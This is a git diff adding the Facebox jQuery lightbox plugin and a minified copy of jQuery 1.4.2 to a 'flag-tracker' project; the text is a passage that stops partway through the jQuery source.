a/flag-tracker/facebox/facebox.js b/flag-tracker/facebox/facebox.js @@ -0,0 +1,309 @@ +/* + * Facebox (for jQuery) + * version: 1.3 + * @requires jQuery v1.2 or later + * @homepage https://github.com/defunkt/facebox + * + * Licensed under the MIT: + * http://www.opensource.org/licenses/mit-license.php + * + * Copyright Forever Chris Wanstrath, Kyle Neath + * + * Usage: + * + * jQuery(document).ready(function() { + * jQuery('a[rel*=facebox]').facebox() + * }) + * + * <a href="#terms" rel="facebox">Terms</a> + * Loads the #terms div in the box + * + * <a href="terms.html" rel="facebox">Terms</a> + * Loads the terms.html page in the box + * + * <a href="terms.png" rel="facebox">Terms</a> + * Loads the terms.png image in the box + * + * + * You can also use it programmatically: + * + * jQuery.facebox('some html') + * jQuery.facebox('some html', 'my-groovy-style') + * + * The above will open a facebox with "some html" as the content. + * + * jQuery.facebox(function($) { + * $.get('blah.html', function(data) { $.facebox(data) }) + * }) + * + * The above will show a loading screen before the passed function is called, + * allowing for a better ajaxy experience. + * + * The facebox function can also display an ajax page, an image, or the contents of a div: + * + * jQuery.facebox({ ajax: 'remote.html' }) + * jQuery.facebox({ ajax: 'remote.html' }, 'my-groovy-style') + * jQuery.facebox({ image: 'stairs.jpg' }) + * jQuery.facebox({ image: 'stairs.jpg' }, 'my-groovy-style') + * jQuery.facebox({ div: '#box' }) + * jQuery.facebox({ div: '#box' }, 'my-groovy-style') + * + * Want to close the facebox? Trigger the 'close.facebox' document event: + * + * jQuery(document).trigger('close.facebox') + * + * Facebox also has a bunch of other hooks: + * + * loading.facebox + * beforeReveal.facebox + * reveal.facebox (aliased as 'afterReveal.facebox') + * init.facebox + * afterClose.facebox + * + * Simply bind a function to any of these hooks: + * + * $(document).bind('reveal.facebox', function() { ...stuff to do after the facebox and contents are revealed... }) + * + */ +(function($) { + $.facebox = function(data, klass) { + $.facebox.loading() + + if (data.ajax) fillFaceboxFromAjax(data.ajax, klass) + else if (data.image) fillFaceboxFromImage(data.image, klass) + else if (data.div) fillFaceboxFromHref(data.div, klass) + else if ($.isFunction(data)) data.call($) + else $.facebox.reveal(data, klass) + } + + /* + * Public, $.facebox methods + */ + + $.extend($.facebox, { + settings: { + opacity : 0.2, + overlay : true, + loadingImage : '/facebox/loading.gif', + closeImage : '/facebox/closelabel.png', + imageTypes : [ 'png', 'jpg', 'jpeg', 'gif' ], + faceboxHtml : '\ + <div id="facebox" style="display:none;"> \ + <div class="popup"> \ + <div class="content"> \ + </div> \ + <a href="#" class="close"></a> \ + </div> \ + </div>' + }, + + loading: function() { + init() + if ($('#facebox .loading').length == 1) return true + showOverlay() + + $('#facebox .content').empty(). + append('<div class="loading"><img src="'+$.facebox.settings.loadingImage+'"/></div>') + + $('#facebox').show().css({ + top: getPageScroll()[1] + (getPageHeight() / 10), + left: $(window).width() / 2 - ($('#facebox .popup').outerWidth() / 2) + }) + + $(document).bind('keydown.facebox', function(e) { + if (e.keyCode == 27) $.facebox.close() + return true + }) + $(document).trigger('loading.facebox') + }, + + reveal: function(data, klass) { + $(document).trigger('beforeReveal.facebox') + if (klass) $('#facebox .content').addClass(klass) + $('#facebox .content').empty().append(data) + $('#facebox .popup').children().fadeIn('normal') + $('#facebox').css('left', $(window).width() / 2 - ($('#facebox .popup').outerWidth() / 2)) + $(document).trigger('reveal.facebox').trigger('afterReveal.facebox') + }, + + close: function() { + $(document).trigger('close.facebox') + return false + } + }) + + /* + * Public, $.fn methods + */ + + $.fn.facebox = function(settings) { + if ($(this).length == 0) return + + init(settings) + + function clickHandler() { + $.facebox.loading(true) + + // support for rel="facebox.inline_popup" syntax, to add a class + // also supports deprecated "facebox[.inline_popup]" syntax + var klass = this.rel.match(/facebox\[?\.(\w+)\]?/) + if (klass) klass = klass[1] + + fillFaceboxFromHref(this.href, klass) + return false + } + + return this.bind('click.facebox', clickHandler) + } + + /* + * Private methods + */ + + // called one time to setup facebox on this page + function init(settings) { + if ($.facebox.settings.inited) return true + else $.facebox.settings.inited = true + + $(document).trigger('init.facebox') + makeCompatible() + + var imageTypes = $.facebox.settings.imageTypes.join('|') + $.facebox.settings.imageTypesRegexp = new RegExp('\\.(' + imageTypes + ')(\\?.*)?$', 'i') + + if (settings) $.extend($.facebox.settings, settings) + $('body').append($.facebox.settings.faceboxHtml) + + var preload = [ new Image(), new Image() ] + preload[0].src = $.facebox.settings.closeImage + preload[1].src = $.facebox.settings.loadingImage + + $('#facebox').find('.b:first, .bl').each(function() { + preload.push(new Image()) + preload.slice(-1).src = $(this).css('background-image').replace(/url\((.+)\)/, '$1') + }) + + $('#facebox .close') + .click($.facebox.close) + .append('<img src="' + + $.facebox.settings.closeImage + + '" class="close_image" title="close">') + } + + // getPageScroll() by quirksmode.com + function getPageScroll() { + var xScroll, yScroll; + if (self.pageYOffset) { + yScroll = self.pageYOffset; + xScroll = self.pageXOffset; + } else if (document.documentElement && document.documentElement.scrollTop) { // Explorer 6 Strict + yScroll = document.documentElement.scrollTop; + xScroll = document.documentElement.scrollLeft; + } else if (document.body) {// all other Explorers + yScroll = document.body.scrollTop; + xScroll = document.body.scrollLeft; + } + return new Array(xScroll,yScroll) + } + + // Adapted from getPageSize() by quirksmode.com + function getPageHeight() { + var windowHeight + if (self.innerHeight) { // all except Explorer + windowHeight = self.innerHeight; + } else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode + windowHeight = document.documentElement.clientHeight; + } else if (document.body) { // other Explorers + windowHeight = document.body.clientHeight; + } + return windowHeight + } + + // Backwards compatibility + function makeCompatible() { + var $s = $.facebox.settings + + $s.loadingImage = $s.loading_image || $s.loadingImage + $s.closeImage = $s.close_image || $s.closeImage + $s.imageTypes = $s.image_types || $s.imageTypes + $s.faceboxHtml = $s.facebox_html || $s.faceboxHtml + } + + // Figures out what you want to display and displays it + // formats are: + // div: #id + // image: blah.extension + // ajax: anything else + function fillFaceboxFromHref(href, klass) { + // div + if (href.match(/#/)) { + var url = window.location.href.split('#')[0] + var target = href.replace(url,'') + if (target == '#') return + $.facebox.reveal($(target).html(), klass) + + // image + } else if (href.match($.facebox.settings.imageTypesRegexp)) { + fillFaceboxFromImage(href, klass) + // ajax + } else { + fillFaceboxFromAjax(href, klass) + } + } + + function fillFaceboxFromImage(href, klass) { + var image = new Image() + image.onload = function() { + $.facebox.reveal('<div class="image"><img src="' + image.src + '" /></div>', klass) + } + image.src = href + } + + function fillFaceboxFromAjax(href, klass) { + $.get(href, function(data) { $.facebox.reveal(data, klass) }) + } + + function skipOverlay() { + return $.facebox.settings.overlay == false || $.facebox.settings.opacity === null + } + + function showOverlay() { + if (skipOverlay()) return + + if ($('#facebox_overlay').length == 0) + $("body").append('<div id="facebox_overlay" class="facebox_hide"></div>') + + $('#facebox_overlay').hide().addClass("facebox_overlayBG") + .css('opacity', $.facebox.settings.opacity) + .click(function() { $(document).trigger('close.facebox') }) + .fadeIn(200) + return false + } + + function hideOverlay() { + if (skipOverlay()) return + + $('#facebox_overlay').fadeOut(200, function(){ + $("#facebox_overlay").removeClass("facebox_overlayBG") + $("#facebox_overlay").addClass("facebox_hide") + $("#facebox_overlay").remove() + }) + + return false + } + + /* + * Bindings + */ + + $(document).bind('close.facebox', function() { + $(document).unbind('keydown.facebox') + $('#facebox').fadeOut(function() { + $('#facebox .content').removeClass().addClass('content') + $('#facebox .loading').remove() + $(document).trigger('afterClose.facebox') + }) + hideOverlay() + }) + +})(jQuery); diff --git a/flag-tracker/facebox/lib/jquery.js b/flag-tracker/facebox/lib/jquery.js @@ -0,0 +1,154 @@ +/*! + * jQuery JavaScript Library v1.4.2 + * http://jquery.com/ + * + * Copyright 2010, John Resig + * Dual licensed under the MIT or GPL Version 2 licenses. + * http://jquery.org/license + * + * Includes Sizzle.js + * http://sizzlejs.com/ + * Copyright 2010, The Dojo Foundation + * Released under the MIT, BSD, and GPL Licenses. + * + * Date: Sat Feb 13 22:33:48 2010 -0500 + */ +(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o],o,e(a[o],b)):d,j);return a}return i? +e(a[0],b):w}function J(){return(new Date).getTime()}function Y(){return false}function Z(){return true}function na(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function oa(a){var b,d=[],f=[],e=arguments,j,i,o,k,n,r;i=c.data(this,"events");if(!(a.liveFired===this||!i||!i.live||a.button&&a.type==="click")){a.liveFired=this;var u=i.live.slice(0);for(k=0;k<u.length;k++){i=u[k];i.origType.replace(O,"")===a.type?f.push(i.selector):u.splice(k--,1)}j=c(a.target).closest(f,a.currentTarget);n=0;for(r= +j.length;n<r;n++)for(k=0;k<u.length;k++){i=u[k];if(j[n].selector===i.selector){o=j[n].elem;f=null;if(i.preType==="mouseenter"||i.preType==="mouseleave")f=c(a.relatedTarget).closest(i.selector)[0];if(!f||f!==o)d.push({elem:o,handleObj:i})}}n=0;for(r=d.length;n<r;n++){j=d[n];a.currentTarget=j.elem;a.data=j.handleObj.data;a.handleObj=j.handleObj;if(j.handleObj.origHandler.apply(j.elem,e)===false){b=false;break}}return b}}function pa(a,b){return"live."+(a&&a!=="*"?a+".":"")+b.replace(/\./g,"`").replace(/ /g, +"&")}function qa(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function ra(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var f=c.data(a[d++]),e=c.data(this,f);if(f=f&&f.events){delete e.handle;e.events={};for(var j in f)for(var i in f[j])c.event.add(this,j,f[j][i],f[j][i].data)}}})}function sa(a,b,d){var f,e,j;b=b&&b[0]?b[0].ownerDocument||b[0]:s;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&b===s&&!ta.test(a[0])&&(c.support.checkClone||!ua.test(a[0]))){e= +true;if(j=c.fragments[a[0]])if(j!==1)f=j}if(!f){f=b.createDocumentFragment();c.clean(a,b,f,d)}if(e)c.fragments[a[0]]=j?f:1;return{fragment:f,cacheable:e}}function K(a,b){var d={};c.each(va.concat.apply([],va.slice(0,b)),function(){d[this]=a});return d}function wa(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var c=function(a,b){return new c.fn.init(a,b)},Ra=A.jQuery,Sa=A.$,s=A.document,T,Ta=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,Ua=/^.[^:#\[\.,]*$/,Va=/\S/, +Wa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,Xa=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,P=navigator.userAgent,xa=false,Q=[],L,$=Object.prototype.toString,aa=Object.prototype.hasOwnProperty,ba=Array.prototype.push,R=Array.prototype.slice,ya=Array.prototype.indexOf;c.fn=c.prototype={init:function(a,b){var d,f;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!b){this.context=s;this[0]=s.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=Ta.exec(a))&& +(d[1]||!b))if(d[1]){f=b?b.ownerDocument||b:s;if(a=Xa.exec(a))if(c.isPlainObject(b)){a=[s.createElement(a[1])];c.fn.attr.call(a,b,true)}else a=[f.createElement(a[1])];else{a=sa([d[1]],[f]);a=(a.cacheable?a.fragment.cloneNode(true):a.fragment).childNodes}return c.merge(this,a)}else{if(b=s.getElementById(d[2])){if(b.id!==d[2])return T.find(a);this.length=1;this[0]=b}this.context=s;this.selector=a;return this}else if(!b&&/^\w+$/.test(a)){this.selector=a;this.context=s;a=s.getElementsByTagName(a);return c.merge(this, +a)}else return!b||b.jquery?(b||T).find(a):c(b).find(a);else if(c.isFunction(a))return T.ready(a);if(a.selector!==w){this.selector=a.selector;this.context=a.context}return c.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return R.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,b,d){var f=c();c.isArray(a)?ba.apply(f,a):c.merge(f,a);f.prevObject=this;f.context=this.context;if(b=== +"find")f.selector=this.selector+(this.selector?" ":"")+d;else if(b)f.selector=this.selector+"."+b+"("+d+")";return f},each:function(a,b){return c.each(this,a,b)},ready:function(a){c.bindReady();if(c.isReady)a.call(s,c);else Q&&Q.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(R.apply(this,arguments),"slice",R.call(arguments).join(","))},map:function(a){return this.pushStack(c.map(this, +function(b,d){return a.call(b,d,b)}))},end:function(){return this.prevObject||c(null)},push:ba,sort:[].sort,splice:[].splice};c.fn.init.prototype=c.fn;c.extend=c.fn.extend=function(){var a=arguments[0]||{},b=1,d=arguments.length,f=false,e,j,i,o;if(typeof a==="boolean"){f=a;a=arguments[1]||{};b=2}if(typeof a!=="object"&&!c.isFunction(a))a={};if(d===b){a=this;--b}for(;b<d;b++)if((e=arguments[b])!=null)for(j in e){i=a[j];o=e[j];if(a!==o)if(f&&o&&(c.isPlainObject(o)||c.isArray(o))){i=i&&(c.isPlainObject(i)|| +c.isArray(i))?i:c.isArray(o)?[]:{};a[j]=c.extend(f,i,o)}else if(o!==w)a[j]=o}return a};c.extend({noConflict:function(a){A.$=Sa;if(a)A.jQuery=Ra;return c},isReady:false,ready:function(){if(!c.isReady){if(!s.body)return setTimeout(c.ready,13);c.isReady=true;if(Q){for(var a,b=0;a=Q[b++];)a.call(s,c);Q=null}c.fn.triggerHandler&&c(s).triggerHandler("ready")}},bindReady:function(){if(!xa){xa=true;if(s.readyState==="complete")return c.ready();if(s.addEventListener){s.addEventListener("DOMContentLoaded", +L,false);A.addEventListener("load",c.ready,false)}else if(s.attachEvent){s.attachEvent("onreadystatechange",L);A.attachEvent("onload",c.ready);var a=false;try{a=A.frameElement==null}catch(b){}s.documentElement.doScroll&&a&&ma()}}},isFunction:function(a){return $.call(a)==="[object Function]"},isArray:function(a){return $.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||$.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!aa.call(a,"constructor")&&!aa.call(a.constructor.prototype, +"isPrototypeOf"))return false;var b;for(b in a);return b===w||aa.call(a,b)},isEmptyObject:function(a){for(var b in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=c.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return A.JSON&&A.JSON.parse?A.JSON.parse(a):(new Function("return "+ +a))();else c.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&Va.test(a)){var b=s.getElementsByTagName("head")[0]||s.documentElement,d=s.createElement("script");d.type="text/javascript";if(c.support.scriptEval)d.appendChild(s.createTextNode(a));else d.text=a;b.insertBefore(d,b.firstChild);b.removeChild(d)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,b,d){var f,e=0,j=a.length,i=j===w||c.isFunction(a);if(d)if(i)for(f in a){if(b.apply(a[f], +d)===false)break}else for(;e<j;){if(b.apply(a[e++],d)===false)break}else if(i)for(f in a){if(b.call(a[f],f,a[f])===false)break}else for(d=a[0];e<j&&b.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(Wa,"")},makeArray:function(a,b){b=b||[];if(a!=null)a.length==null||typeof a==="string"||c.isFunction(a)||typeof a!=="function"&&a.setInterval?ba.call(b,a):c.merge(b,a);return b},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var d=0,f=b.length;d<f;d++)if(b[d]=== +a)return d;return-1},merge:function(a,b){var d=a.length,f=0;if(typeof b.length==="number")for(var e=b.length;f<e;f++)a[d++]=b[f];else for(;b[f]!==w;)a[d++]=b[f++];a.length=d;return a},grep:function(a,b,d){for(var f=[],e=0,j=a.length;e<j;e++)!d!==!b(a[e],e)&&f.push(a[e]);return f},map:function(a,b,d){for(var f=[],e,j=0,i=a.length;j<i;j++){e=b(a[j],j,d);if(e!=null)f[f.length]=e}return f.concat.apply([],f)},guid:1,proxy:function(a,b,d){if(arguments.length===2)if(typeof b==="string"){d=a;a=d[b];b=w}else if(b&& +!c.isFunction(b)){d=b;b=w}if(!b&&a)b=function(){return a.apply(d||this,arguments)};if(a)b.guid=a.guid=a.guid||b.guid||c.guid++;return b},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});P=c.uaMatch(P);if(P.browser){c.browser[P.browser]=true;c.browser.version=P.version}if(c.browser.webkit)c.browser.safari= +true;if(ya)c.inArray=function(a,b){return ya.call(b,a)};T=c(s);if(s.addEventListener)L=function(){s.removeEventListener("DOMContentLoaded",L,false);c.ready()};else if(s.attachEvent)L=function(){if(s.readyState==="complete"){s.detachEvent("onreadystatechange",L);c.ready()}};(function(){c.support={};var a=s.documentElement,b=s.createElement("script"),d=s.createElement("div"),f="script"+J();d.style.display="none";d.innerHTML=" <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>"; +var e=d.getElementsByTagName("*"),j=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!j)){c.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(j.getAttribute("style")),hrefNormalized:j.getAttribute("href")==="/a",opacity:/^0.55$/.test(j.style.opacity),cssFloat:!!j.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:s.createElement("select").appendChild(s.createElement("option")).selected, +parentNode:d.removeChild(d.appendChild(s.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};b.type="text/javascript";try{b.appendChild(s.createTextNode("window."+f+"=1;"))}catch(i){}a.insertBefore(b,a.firstChild);if(A[f]){c.support.scriptEval=true;delete A[f]}try{delete b.test}catch(o){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function k(){c.support.noCloneEvent= +false;d.detachEvent("onclick",k)});d.cloneNode(true).fireEvent("onclick")}d=s.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=s.createDocumentFragment();a.appendChild(d.firstChild);c.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;c(function(){var k=s.createElement("div");k.style.width=k.style.paddingLeft="1px";s.body.appendChild(k);c.boxModel=c.support.boxModel=k.offsetWidth===2;s.body.removeChild(k).style.display="none"});a=function(k){var n= +s.createElement("div");k="on"+k;var r=k in n;if(!r){n.setAttribute(k,"return;");r=typeof n[k]==="function"}return r};c.support.submitBubbles=a("submit");c.support.changeBubbles=a("change");a=b=d=e=j=null}})();c.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var G="jQuery"+J(),Ya=0,za={};c.extend({cache:{},expando:G,noData:{embed:true,object:true, +applet:true},data:function(a,b,d){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var f=a[G],e=c.cache;if(!f&&typeof b==="string"&&d===w)return null;f||(f=++Ya);if(typeof b==="object"){a[G]=f;e[f]=c.extend(true,{},b)}else if(!e[f]){a[G]=f;e[f]={}}a=e[f];if(d!==w)a[b]=d;return typeof b==="string"?a[b]:a}},removeData:function(a,b){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var d=a[G],f=c.cache,e=f[d];if(b){if(e){delete e[b];c.isEmptyObject(e)&&c.removeData(a)}}else{if(c.support.deleteExpando)delete a[c.expando]; +else a.removeAttribute&&a.removeAttribute(c.expando);delete f[d]}}}});c.fn.extend({data:function(a,b){if(typeof a==="undefined"&&this.length)return c.data(this[0]);else if(typeof a==="object")return this.each(function(){c.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(b===w){var f=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(f===w&&this.length)f=c.data(this[0],a);return f===w&&d[1]?this.data(d[0]):f}else return this.trigger("setData"+d[1]+"!",[d[0],b]).each(function(){c.data(this, +a,b)})},removeData:function(a){return this.each(function(){c.removeData(this,a)})}});c.extend({queue:function(a,b,d){if(a){b=(b||"fx")+"queue";var f=c.data(a,b);if(!d)return f||[];if(!f||c.isArray(d))f=c.data(a,b,c.makeArray(d));else f.push(d);return f}},dequeue:function(a,b){b=b||"fx";var d=c.queue(a,b),f=d.shift();if(f==="inprogress")f=d.shift();if(f){b==="fx"&&d.unshift("inprogress");f.call(a,function(){c.dequeue(a,b)})}}});c.fn.extend({queue:function(a,b){if(typeof a!=="string"){b=a;a="fx"}if(b=== +w)return c.queue(this[0],a);return this.each(function(){var d=c.queue(this,a,b);a==="fx"&&d[0]!=="inprogress"&&c.dequeue(this,a)})},dequeue:function(a){return this.each(function(){c.dequeue(this,a)})},delay:function(a,b){a=c.fx?c.fx.speeds[a]||a:a;b=b||"fx";return this.queue(b,function(){var d=this;setTimeout(function(){c.dequeue(d,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var Aa=/[\n\t]/g,ca=/\s+/,Za=/\r/g,$a=/href|src|style/,ab=/(button|input)/i,bb=/(button|input|object|select|textarea)/i, +cb=/^(a|area)$/i,Ba=/radio|checkbox/;c.fn.extend({attr:function(a,b){return X(this,a,b,true,c.attr)},removeAttr:function(a){return this.each(function(){c.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(c.isFunction(a))return this.each(function(n){var r=c(this);r.addClass(a.call(this,n,r.attr("class")))});if(a&&typeof a==="string")for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var j=" "+e.className+" ", +i=e.className,o=0,k=b.length;o<k;o++)if(j.indexOf(" "+b[o]+" ")<0)i+=" "+b[o];e.className=c.trim(i)}else e.className=a}return this},removeClass:function(a){if(c.isFunction(a))return this.each(function(k){var n=c(this);n.removeClass(a.call(this,k,n.attr("class")))});if(a&&typeof a==="string"||a===w)for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var j=(" "+e.className+" ").replace(Aa," "),i=0,o=b.length;i<o;i++)j=j.replace(" "+b[i]+" ", +" ");e.className=c.trim(j)}else e.className=""}return this},toggleClass:function(a,b){var d=typeof a,f=typeof b==="boolean";if(c.isFunction(a))return this.each(function(e){var j=c(this);j.toggleClass(a.call(this,e,j.attr("class"),b),b)});return this.each(function(){if(d==="string")for(var e,j=0,i=c(this),o=b,k=a.split(ca);e=k[j++];){o=f?o:!i.hasClass(e);i[o?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&c.data(this,"__className__",this.className);this.className= +this.className||a===false?"":c.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var b=0,d=this.length;b<d;b++)if((" "+this[b].className+" ").replace(Aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===w){var b=this[0];if(b){if(c.nodeName(b,"option"))return(b.attributes.value||{}).specified?b.value:b.text;if(c.nodeName(b,"select")){var d=b.selectedIndex,f=[],e=b.options;b=b.type==="select-one";if(d<0)return null;var j=b?d:0;for(d=b?d+1:e.length;j<d;j++){var i= +e[j];if(i.selected){a=c(i).val();if(b)return a;f.push(a)}}return f}if(Ba.test(b.type)&&!c.support.checkOn)return b.getAttribute("value")===null?"on":b.value;return(b.value||"").replace(Za,"")}return w}var o=c.isFunction(a);return this.each(function(k){var n=c(this),r=a;if(this.nodeType===1){if(o)r=a.call(this,k,n.val());if(typeof r==="number")r+="";if(c.isArray(r)&&Ba.test(this.type))this.checked=c.inArray(n.val(),r)>=0;else if(c.nodeName(this,"select")){var u=c.makeArray(r);c("option",this).each(function(){this.selected= +c.inArray(c(this).val(),u)>=0});if(!u.length)this.selectedIndex=-1}else this.value=r}})}});c.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,b,d,f){if(!a||a.nodeType===3||a.nodeType===8)return w;if(f&&b in c.attrFn)return c(a)[b](d);f=a.nodeType!==1||!c.isXMLDoc(a);var e=d!==w;b=f&&c.props[b]||b;if(a.nodeType===1){var j=$a.test(b);if(b in a&&f&&!j){if(e){b==="type"&&ab.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed"); +a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&b.specified?b.value:bb.test(a.nodeName)||cb.test(a.nodeName)&&a.href?0:w;return a[b]}if(!c.support.style&&f&&b==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(b,""+d);a=!c.support.hrefNormalized&&f&&j?a.getAttribute(b,2):a.getAttribute(b);return a===null?w:a}return c.style(a,b,d)}});var O=/\.(.*)$/,db=function(a){return a.replace(/[^\w\s\.\|`]/g, +function(b){return"\\"+b})};c.event={add:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==A&&!a.frameElement)a=A;var e,j;if(d.handler){e=d;d=e.handler}if(!d.guid)d.guid=c.guid++;if(j=c.data(a)){var i=j.events=j.events||{},o=j.handle;if(!o)j.handle=o=function(){return typeof c!=="undefined"&&!c.event.triggered?c.event.handle.apply(o.elem,arguments):w};o.elem=a;b=b.split(" ");for(var k,n=0,r;k=b[n++];){j=e?c.extend({},e):{handler:d,data:f};if(k.indexOf(".")>-1){r=k.split("."); +k=r.shift();j.namespace=r.slice(0).sort().join(".")}else{r=[];j.namespace=""}j.type=k;j.guid=d.guid;var u=i[k],z=c.event.special[k]||{};if(!u){u=i[k]=[];if(!z.setup||z.setup.call(a,f,r,o)===false)if(a.addEventListener)a.addEventListener(k,o,false);else a.attachEvent&&a.attachEvent("on"+k,o)}if(z.add){z.add.call(a,j);if(!j.handler.guid)j.handler.guid=d.guid}u.push(j);c.event.global[k]=true}a=null}}},global:{},remove:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){var e,j=0,i,o,k,n,r,u,z=c.data(a), +C=z&&z.events;if(z&&C){if(b&&b.type){d=b.handler;b=b.type}if(!b||typeof b==="string"&&b.charAt(0)==="."){b=b||"";for(e in C)c.event.remove(a,e+b)}else{for(b=b.split(" ");e=b[j++];){n=e;i=e.indexOf(".")<0;o=[];if(!i){o=e.split(".");e=o.shift();k=new RegExp("(^|\\.)"+c.map(o.slice(0).sort(),db).join("\\.(?:.*\\.)?")+"(\\.|$)")}if(r=C[e])if(d){n=c.event.special[e]||{};for(B=f||0;B<r.length;B++){u=r[B];if(d.guid===u.guid){if(i||k.test(u.namespace)){f==null&&r.splice(B--,1);n.remove&&n.remove.call(a,u)}if(f!= +null)break}}if(r.length===0||f!=null&&r.length===1){if(!n.teardown||n.teardown.call(a,o)===false)Ca(a,e,z.handle);delete C[e]}}else for(var B=0;B<r.length;B++){u=r[B];if(i||k.test(u.namespace)){c.event.remove(a,n,u.handler,B);r.splice(B--,1)}}}if(c.isEmptyObject(C)){if(b=z.handle)b.elem=null;delete z.events;delete z.handle;c.isEmptyObject(z)&&c.removeData(a)}}}}},trigger:function(a,b,d,f){var e=a.type||a;if(!f){a=typeof a==="object"?a[G]?a:c.extend(c.Event(e),a):c.Event(e);if(e.indexOf("!")>=0){a.type= +e=e.slice(0,-1);a.exclusive=true}if(!d){a.stopPropagation();c.event.global[e]&&c.each(c.cache,function(){this.events&&this.events[e]&&c.event.trigger(a,b,this.handle.elem)})}if(!d||d.nodeType===3||d.nodeType===8)return w;a.result=w;a.target=d;b=c.makeArray(b);b.unshift(a)}a.currentTarget=d;(f=c.data(d,"handle"))&&f.apply(d,b);f=d.parentNode||d.ownerDocument;try{if(!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()]))if(d["on"+e]&&d["on"+e].apply(d,b)===false)a.result=false}catch(j){}if(!a.isPropagationStopped()&& +f)c.event.trigger(a,b,f,true);else if(!a.isDefaultPrevented()){f=a.target;var i,o=c.nodeName(f,"a")&&e==="click",k=c.event.special[e]||{};if((!k._default||k._default.call(d,a)===false)&&!o&&!(f&&f.nodeName&&c.noData[f.nodeName.toLowerCase()])){try{if(f[e]){if(i=f["on"+e])f["on"+e]=null;c.event.triggered=true;f[e]()}}catch(n){}if(i)f["on"+e]=i;c.event.triggered=false}}},handle:function(a){var b,d,f,e;a=arguments[0]=c.event.fix(a||A.event);a.currentTarget=this;b=a.type.indexOf(".")<0&&!a.exclusive; +if(!b){d=a.type.split(".");a.type=d.shift();f=new 